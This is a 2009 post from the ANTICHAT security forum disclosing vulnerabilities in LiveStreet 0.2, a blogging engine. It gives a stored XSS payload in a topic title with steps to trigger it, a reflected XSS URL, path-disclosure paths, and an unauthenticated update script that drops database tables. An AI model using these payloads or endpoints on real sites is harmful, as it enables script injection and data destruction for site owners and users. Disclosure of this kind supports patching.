HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу LiveStreet (аналог хабра)
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

LiveStreet (аналог хабра)
  #1  
Старый 29.01.2009, 12:53
BlackSun
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами: 10058786

Репутация: 4589


По умолчанию LiveStreet (аналог хабра)
LiveStreet
Офф сайт: http://livestreet.ru/
Текущая версия: LiveStreet 0.2 — 05.11.2008
Ссылка на скачивание: http://sourceforge.net/projects/livestreet/

Активная XSS
-- создаем топик, в заголовке пишем <img src=. onerror=alert()>
-- постим комент в создайнный топик
-- заходим на страницу
-- -- Прямой эфир ( /comments/ ), либо
-- -- В свой профиль > Публикации > Коментарии ( /my/твой ник/comment/ )

Раскрытие путей
/classes/lib/external/Smarty-2.6.19/demo/
/classes/lib/external/Smarty-2.6.19/libs/Smarty_Compiler.class.php
/classes/lib/external/Smarty-2.6.19/unit_test/smarty_unit_test_gui.php
/classes/lib/external/Smarty-2.6.19/unit_test/smarty_unit_test.php
/classes/lib/external/Smarty-2.6.19/unit_test/test_cases.php
/include/function.php
/templates/compiled/*

Пассивная XSS
/include/ajax/blogInfo.php?asd=<script>alert()</script>

А вот тут
/update/update_0.1.2_to_0.2.php
виднеются DROP TABLE и т.п. без какой либо авторизации ...
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
аналог рамблер icq Ctr1A1tDe1ete Skype, IRC, ICQ, Jabber и другие IM 3 11.11.2006 22:26



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.